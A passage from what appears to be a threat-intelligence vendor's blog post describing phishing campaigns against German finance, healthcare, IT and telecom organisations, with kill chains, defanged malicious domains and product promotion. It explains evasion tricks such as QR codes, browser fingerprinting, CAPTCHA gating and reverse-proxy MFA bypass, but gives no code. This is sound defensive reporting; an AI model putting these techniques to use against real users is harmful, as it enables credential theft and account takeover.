<li>Deep reliance on Microsoft 365, cloud services, and SaaS&nbsp;ecosystems;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Critical industries interconnected across supply chains.&nbsp;</li>
</ul>



<p>Germany’s industrial backbone — the&nbsp;Mittelstand&nbsp;of small and medium-sized enterprises, alongside globally recognized corporations in chemicals, automotive, and engineering —&nbsp;represents&nbsp;a vast attack surface. These organizations often store sensitive IP, manage critical infrastructure, and handle large financial transactions, yet historically have&nbsp;underinvested&nbsp;in cybersecurity relative to their size and importance.&nbsp;</p>



<p>Geopolitics adds fuel to the&nbsp;fire&nbsp;provoking a sharp increase in professional, often state-directed attacks by&nbsp;<a href="https://any.run/cybersecurity-blog/track-advanced-persistent-threats/" target="_blank" rel="noreferrer noopener">APT groups</a>&nbsp;(Advanced Persistent Threats) linked to geopolitical conflicts. Germany’s role in the EU, NATO, and global trade makes it a high-value intelligence target for foreign actors.&nbsp;</p>



<ul class="wp-block-list">
<li>In 2024, cyberattacks caused approximately €178.6 billion in financial losses to German businesses, equivalent to 67% of all damage from corporate crime. (<a href="https://www.bitkom.org/EN/List-and-detailpages/Publications/Economic-Security-2022" target="_blank" rel="noreferrer noopener">Bitkom</a>).&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>83% of German businesses fell victim to ransomware in 2024, according to the Cyber Security Report 2025 by Schwarz Digits.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The BSI’s 2024/2025&nbsp;<a href="https://www.bsi.bund.de/EN/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html" target="_blank" rel="noreferrer noopener">reports</a>&nbsp;describe the IT security situation as “tense,” with 309,000 new malware variants appearing daily, ransomware attacks up 77%, and 22&nbsp;state-sponsored APT groups active on German soil.&nbsp;</li>
</ul>



<p>Phishing remains the most prevalent attack vector. The BSI confirmed that <a href="https://any.run/cybersecurity-blog/how-to-track-phishkits/" target="_blank" rel="noreferrer noopener">phishing</a> attacks expanded well beyond the financial sector in 2024, with attackers impersonating streaming services, logistics firms, government agencies, and enterprise software platforms like Microsoft 365.</p>



<h2 class="wp-block-heading">How&nbsp;German&nbsp;Companies Can&nbsp;Discover Industry-Specific&nbsp;Cyberattacks&nbsp;&nbsp;</h2>



<p>ANY.RUN’s&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>, a searchable database of threat data from live malware analysis by a community of over 15K SOC teams, supports the mapping of attack indicators to specific sectors and regions.&nbsp;&nbsp;</p>



<p>A local&nbsp;<a href="https://any.run/cybersecurity-blog/industry-geo-threat-landscape/" target="_blank" rel="noreferrer noopener">cyberthreat landscape</a>&nbsp;can be revealed by combining lookups for an industry and a malware sample submission country, and by limiting the search period to see the most recent threats.&nbsp;&nbsp;&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookup#%7B%2522query%2522:%2522industry:%255C%2522Telecommunications%255C%2522%2520AND%2520submissionCountry:%255C%2522DE%255C%2522%2522,%2522dateRange%2522:14%7D" target="_blank" rel="noreferrer noopener">industry:&#8221;Telecommunications&#8221; AND&nbsp;submissionCountry:&#8221;DE&#8221;</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="577" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-1024x577.png" alt="" class="wp-image-19926" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-1024x577.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-1536x865.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_1.png 1587w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threats targeting German telecom companies</em></figcaption></figure>



<p>Search&nbsp;for&nbsp;a threat, country, and industry, switch to the Analyses tab in the results, and see&nbsp;a selection of sandbox analyses.&nbsp;&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookup#%7B%2522query%2522:%2522industry:%255C%2522Telecommunications%255C%2522%2520AND%2520submissionCountry:%255C%2522DE%255C%2522%2520AND%2520threatName:%255C%2522xworm%255C%2522%2522,%2522dateRange%2522:14%7D" target="_blank" rel="noreferrer noopener">industry:&#8221;Telecommunications&#8221; AND&nbsp;submissionCountry:&#8221;DE&#8221; AND&nbsp;threatName:&#8221;xworm&#8221;</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="560" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-1024x560.png" alt="" class="wp-image-19931" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-1024x560.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-300x164.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-768x420.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-1536x840.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-370x202.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-270x148.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2-740x405.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_2.png 1586w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Xworm&nbsp;attacks dissected&nbsp;in the sandbox&nbsp;by German analysts</em>&nbsp;</figcaption></figure>



<p>Pivot your research&nbsp;via TI Lookup&nbsp;using IOCs from&nbsp;search results and&nbsp;sandbox analyses and&nbsp;boost triage, detection, and threat hunting in your SOC.&nbsp;&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Make faster security decisions with live threat context. <br>
TI Lookup helps SOC <span class="highlight">detect and respond <br>before damage is done.</span>
&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=german-industries-attack-cases&#038;utm_term=090426&#038;utm_content=linktotilookuplanding#contact-sales" rel="noopener" target="_blank">
Contact sales
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">1.&nbsp;Finance:&nbsp;FlowerStorm&nbsp;Targets a German Investment Firm&nbsp;</h2>



<p><a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktofinance" target="_blank" rel="noreferrer noopener">Financial</a>&nbsp;organizations in Germany&nbsp;operate&nbsp;in a high-trust, high-value environment:&nbsp;</p>



<ul class="wp-block-list">
<li>Sensitive investment and client&nbsp;data;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Heavy use of cloud-based collaboration&nbsp;tools;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Strict compliance requirements&nbsp;</li>
</ul>



<p>This makes employee credentials a golden key. Microsoft 365 credential theft is a dominant threat vector in this sector. Attackers&nbsp;seek&nbsp;to compromise corporate email accounts to intercept transactions, conduct Business Email Compromise (BEC) fraud, or use valid credentials as a launchpad for deeper network intrusion.&nbsp;</p>



<h3 class="wp-block-heading">Threat&nbsp;in Focus:&nbsp;Spearphishing&nbsp;with&nbsp;FlowerStorm&nbsp;</h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="486" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-1024x486.png" alt="" class="wp-image-19942" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-1024x486.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-768x364.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-1536x729.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-370x176.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3-740x351.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_3.png 1850w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>FlowerStorm attack in ANY.RUN&#8217;s Interactive Sandbox</em>&nbsp;</figcaption></figure>



<p><strong>Target</strong>&nbsp;<br>A German investment company managing portfolios in private equity, real estate, and hedge funds. The attack was precision-targeted: the victim’s corporate email address was embedded directly into the phishing link, encoded in Base64.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="614" height="88" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_4.png" alt="" class="wp-image-19944" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_4.png 614w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_4-300x43.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_4-370x53.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_4-270x39.png 270w" sizes="(max-width: 614px) 100vw, 614px" /><figcaption class="wp-element-caption"><em>Email encoded in&nbsp;spearphishing&nbsp;link</em></figcaption></figure>



<p><strong>Attack Type</strong>&nbsp;<br>Spearphishing&nbsp;(targeted credential theft) for Microsoft 365 accounts. ANY.RUN’s sandbox classified this threat as&nbsp;FlowerStorm&nbsp;— a sophisticated phishing-as-a-service platform known for its multi-stage evasion techniques and precision targeting.&nbsp;</p>



<p><strong>Kill Chain</strong>&nbsp;</p>



<ol start="1" class="wp-block-list">
<li>In this case, the&nbsp;attacks&nbsp;starts&nbsp;with a malicious URL. However, as we can see in&nbsp;other&nbsp;analysis sessions, such links are usually delivered&nbsp;via phishing emails&nbsp;containing&nbsp;a PDF attachment. Inside the PDF is a QR code — a deliberate choice to bypass email-based URL scanners that cannot decode visual content.&nbsp;</li>
</ol>



<ol start="2" class="wp-block-list">
<li>The victim scans the QR code and is taken to a landing page&nbsp;with&nbsp;a salary-related lure.&nbsp;&nbsp;</li>
</ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5-1024x578.png" alt="" class="wp-image-19946" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5-1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5-740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_5.png 1360w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake letter about a salary raise</em></figcaption></figure>



<ol start="3" class="wp-block-list">
<li>The page loads a&nbsp;FingerprintJS&nbsp;script to profile the&nbsp;victim’s&nbsp;browser before showing any phishing content. This profiling helps attackers filter out security researchers and automated scanners.&nbsp;</li>
</ol>



<ol start="4" class="wp-block-list">
<li>Cloudflare Turnstile CAPTCHA is activated, blocking automated analysis tools and sandbox detection attempts.&nbsp;</li>
</ol>



<ol start="5" class="wp-block-list">
<li>The victim is redirected to the main phishing domain, which presents a pixel-perfect replica of the Microsoft 365 sign-in page, including a full&nbsp;OAuth&nbsp;flow simulation with&nbsp;client_id,&nbsp;redirect_uri, and&nbsp;response_type&nbsp;parameters.&nbsp;</li>
</ol>



<ol start="6" class="wp-block-list">
<li>Credentials entered by the victim are&nbsp;immediately&nbsp;exfiltrated to attacker-controlled infrastructure.&nbsp;</li>
</ol>



<p><strong>Why It Works</strong>&nbsp;<br>FlowerStorm&nbsp;combines multiple layers of evasion (QR codes, browser fingerprinting, CAPTCHA, Base64 encoding) with surgical targeting. The salary-themed lure is psychologically effective:&nbsp;employees in a finance firm expect payroll-related communications, reducing suspicion. The Microsoft 365 OAuth imitation is technically convincing enough to fool even security-conscious users.&nbsp;</p>



<h2 class="wp-block-heading">2.&nbsp;Healthcare: Microsoft OAuth Abuse Targets a Research Center&nbsp;</h2>



<p><a href="https://any.run/by-industry/healthcare/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktohealthcare" target="_blank" rel="noreferrer noopener">Healthcare</a>&nbsp;in Germany is:&nbsp;</p>



<ul class="wp-block-list">
<li>Highly&nbsp;decentralized;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Data-sensitive (patient records, research);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Often&nbsp;underfunded in&nbsp;cybersecurity.&nbsp;</li>
</ul>



<p>This creates a perfect storm for&nbsp;authentication&nbsp;abuse attacks.&nbsp;</p>



<p>Healthcare breaches carry compounded consequences: regulatory penalties under GDPR, reputational damage, potential disruption to patient care, and the loss of research data that may&nbsp;represent&nbsp;years of work and significant public investment.&nbsp;</p>



<h3 class="wp-block-heading">Threat&nbsp;in Focus: Microsoft OAuth Abuse with Fake Outlook Login&nbsp;</h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="485" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-1024x485.png" alt="" class="wp-image-19948" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-1024x485.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-768x363.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-1536x727.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6-740x350.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_6.png 1851w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Spearphishing attack personalized by email</em>&nbsp;</figcaption></figure>



<p><strong>Target</strong>&nbsp;<br>Germany’s largest medical research center. The attack was highly targeted: the victim’s corporate email appeared in plaintext in the OAuth state parameter and in Base64 in the URL fragment of the phishing page.&nbsp;</p>



<p><strong>Attack Type</strong>&nbsp;<br>Phishing via Microsoft OAuth abuse combined with a fake Outlook login page. The attackers&nbsp;<a href="https://any.run/cybersecurity-blog/oauth-device-code-phishing/" target="_blank" rel="noreferrer noopener">exploited Microsoft’s legitimate OAuth 2.0</a>&nbsp;authentication mechanism, substituting a malicious&nbsp;redirect_uri&nbsp;to capture credentials after the authentication handshake.&nbsp;</p>



<p><strong>Kill Chain</strong>&nbsp;</p>



<ol start="1" class="wp-block-list">
<li>The victim receives a link that begins as a legitimate request to login.microsoftonline.com. The&nbsp;redirect_uri, however, points to a compromised website. The state parameter&nbsp;contains&nbsp;the victim’s email address in plaintext.&nbsp;</li>
</ol>



<ol start="2" class="wp-block-list">
<li>If no active Microsoft session exists, Microsoft returns an error=interaction_required&nbsp;response and redirects the user to the&nbsp;redirect_uri,&nbsp;the compromised WordPress site (saicares.com.au), which loads an intermediate invoice.html page.&nbsp;</li>
</ol>



<ol start="3" class="wp-block-list">
<li>The intermediate page pulls content from&nbsp;ArDrive&nbsp;(a decentralized storage platform), adding another layer of obfuscation and hosting that is difficult to block.&nbsp;</li>
</ol>



<ol start="4" class="wp-block-list">
<li>The victim is redirected to&nbsp;ogbarberschool[.]com — the primary phishing page. The victim’s email appears in the URL fragment both in Base64 and in plaintext, creating a personalized login experience.&nbsp;</li>
</ol>



<ol start="5" class="wp-block-list">
<li>The phishing page&nbsp;contains&nbsp;obfuscated&nbsp;JavaScript and displays a convincing fake Outlook login form.&nbsp;&nbsp;</li>
</ol>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="977" height="510" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_7.png" alt="" class="wp-image-19952" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_7.png 977w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_7-300x157.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_7-768x401.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_7-370x193.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_7-270x141.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_7-740x386.png 740w" sizes="(max-width: 977px) 100vw, 977px" /><figcaption class="wp-element-caption"><em>Forged Outlook page</em></figcaption></figure>



<ol start="6" class="wp-block-list">
<li>Credentials entered by the victim are exfiltrated via a POST request to&nbsp;jewbreats[.]org/rexuzo/owa/apiowa[.]php. Suricata network rules flagged this as a suspicious unencrypted POST request transmitting an email address.&nbsp;</li>
</ol>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="349" height="149" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_8.png" alt="" class="wp-image-19954" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_8.png 349w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_8-300x128.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_8-270x115.png 270w" sizes="(max-width: 349px) 100vw, 349px" /><figcaption class="wp-element-caption"><em>Personal data exfiltrated to attackers’ server</em></figcaption></figure></div>


<p><strong>Why It Works</strong>&nbsp;<br>This attack is particularly dangerous because it begins with a genuine Microsoft domain. A victim who inspects the&nbsp;initial&nbsp;link sees a legitimate login.microsoftonline.com URL, providing false reassurance. By the time the malicious redirect occurs, the victim is already engaged. The use of a compromised WordPress site and decentralized storage makes the infrastructure difficult to detect and take down quickly.&nbsp;</p>



<h2 class="wp-block-heading">3.&nbsp;Technology:&nbsp;Reverse Proxy Phishing&nbsp;Targets an IT Company&nbsp;</h2>



<p>IT companies:&nbsp;</p>



<ul class="wp-block-list">
<li>Manage infrastructure and&nbsp;credentials;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Have privileged access across&nbsp;systems;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Are often&nbsp;stepping stones&nbsp;for supply chain&nbsp;attacks.&nbsp;</li>
</ul>



<p>The sector’s familiarity with technology can create a paradoxical blind spot: IT professionals may be more likely to click links in emails that appear technical or work-related, assuming their technical knowledge makes them immune to social engineering.&nbsp;</p>



<h3 class="wp-block-heading">Threat in Focus:&nbsp;EvilProxy&nbsp;+ EvilGinx2 Combined Attack&nbsp;</h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="486" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-1024x486.png" alt="" class="wp-image-19957" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-1024x486.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-768x364.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-1536x728.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9-740x351.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_9.png 1843w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing detected by ANY.RUN Sandbox</em>&nbsp;</figcaption></figure>



<p><strong>Target</strong>&nbsp;<br>A German IT company. The attack targeted a specific employee, whose email was extracted from the data parameter of a Microsoft Safe Links wrapper,&nbsp;indicating&nbsp;the attacker had prior visibility into the&nbsp;target’s&nbsp;email infrastructure.&nbsp;</p>



<p><strong>Attack Type</strong>&nbsp;<br>Phishing via a combination of&nbsp;EvilProxy&nbsp;and EvilGinx2: two reverse proxy tools used in tandem.&nbsp;<a href="https://any.run/malware-trends/evilproxy/" target="_blank" rel="noreferrer noopener">EvilProxy</a>&nbsp;serves as the primary credential harvesting platform, while EvilGinx2 handles session token interception. Together, they create a real-time proxy of Microsoft’s login infrastructure capable of bypassing multi-factor authentication.&nbsp;</p>



<p><strong>Kill Chain</strong>&nbsp;</p>



<ol start="1" class="wp-block-list">
<li>The victim receives a phishing email urging them to “Review document,” a work-relevant lure that fits the daily workflow of an IT professional.&nbsp;</li>
</ol>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="893" height="461" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_10.png" alt="" class="wp-image-19958" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_10.png 893w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_10-300x155.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_10-768x396.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_10-370x191.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_10-270x139.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_10-740x382.png 740w" sizes="(max-width: 893px) 100vw, 893px" /><figcaption class="wp-element-caption"><em>Fake business email with call to action</em>&nbsp;</figcaption></figure>



<ol start="2" class="wp-block-list">
<li>The embedded link routes through a Mailchimp tracking URL (aviture[.]us7[.]list-manage[.]com),&nbsp;a legitimate email marketing service that lends the link&nbsp;apparent&nbsp;credibility and bypasses reputation-based URL filters.&nbsp;</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Mailchimp redirects to&nbsp;larozada[.]com, a compromised WordPress site hosting an intermediate page with a Cloudflare Turnstile CAPTCHA.&nbsp;</li>
</ol>



<ol start="4" class="wp-block-list">
<li>After CAPTCHA verification, the victim is routed through a Cloudflare Workers serverless function, which performs&nbsp;additional&nbsp;routing to frustrate analysis and attribution.&nbsp;</li>
</ol>



<ol start="5" class="wp-block-list">
<li>The&nbsp;final destination&nbsp;is&nbsp;the main phishing domain&nbsp;(googlmicrozonfaceb0xfileshar3instacloud0fftkdoctormedixxqqw[.]digital) — an&nbsp;EvilProxy&nbsp;instance that&nbsp;reverse-proxies&nbsp;the real Microsoft Login page in real time. The victim sees an authentic Microsoft experience.&nbsp;</li>
</ol>



<ol start="6" class="wp-block-list">
<li>As the victim authenticates,&nbsp;EvilProxy&nbsp;intercepts the session cookie. The attacker now has a valid authenticated session. No password or MFA code&nbsp;required.&nbsp;</li>
</ol>



<p><strong>Why It Works</strong>&nbsp;<br>The use of legitimate services (Mailchimp, Cloudflare Workers, WordPress) at each stage of the attack chain makes it&nbsp;nearly impossible&nbsp;for conventional email filters and web gateways to block. The final&nbsp;EvilProxy&nbsp;stage defeats MFA entirely by hijacking the post-authentication session rather than&nbsp;attempting&nbsp;to steal the second factor. This is an adversary-in-the-middle attack that neutralizes one of the&nbsp;most commonly recommended&nbsp;security controls.&nbsp;</p>



<p>Using TI Lookup, we can see that&nbsp;larozada[.]com is intensely correlated with this attack scenario:&nbsp;&nbsp;<br>&nbsp;<br><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookup#%7B%2522query%2522:%2522domainName:%255C%2522larozada.com%255C%2522%2522,%2522dateRange%2522:180%7D" target="_blank" rel="noreferrer noopener">domainName:&#8221;larozada.com&#8221;</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="519" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-1024x519.png" alt="" class="wp-image-19961" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-1024x519.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-300x152.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-768x389.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-1536x779.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-370x188.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-270x137.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11-740x375.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_11.png 1584w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Interactive Sandbox&nbsp;contains&nbsp;hundreds of&nbsp;malware&nbsp;samples using this domain</em>&nbsp;</figcaption></figure>



<p><br><a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">Integrate</a>&nbsp;Threat Intelligence Feeds&nbsp;in your security&nbsp;stack&nbsp;to have it continuously updated with a real-time stream of indicators (domains, URLs, IPs) for&nbsp;early detection and&nbsp;timely&nbsp;response.&nbsp;&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Protect revenue, reputation, and operations with enterprise-grade threat analysis and intelligence.<br>
<span class="highlight">Reduce risk with ANY.RUN</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=german-industries-attack-cases&#038;utm_term=090426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Request a quote
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">4. Telecom: Phishing-as-a-Service at Scale&nbsp;</h2>



<p>Telecom companies:&nbsp;</p>



<ul class="wp-block-list">
<li>Sit at the heart of communications&nbsp;infrastructure;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Handle massive volumes of user&nbsp;data;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Operate complex, distributed environments.&nbsp;</li>
</ul>



<p>Telecom companies are targeted for multiple strategic reasons: access to customer data at scale, the potential for SIM-swapping attacks, the ability to intercept communications, and the value of internal network access for espionage or infrastructure disruption.&nbsp;&nbsp;</p>



<p>Account takeover via Microsoft 365 credential theft is a priority threat for this sector, as telecom employees use cloud platforms extensively for internal communications, customer management, and operational coordination.&nbsp;</p>



<h3 class="wp-block-heading">Threat in Focus:&nbsp;EvilProxy&nbsp;without personalization&nbsp;</h3>



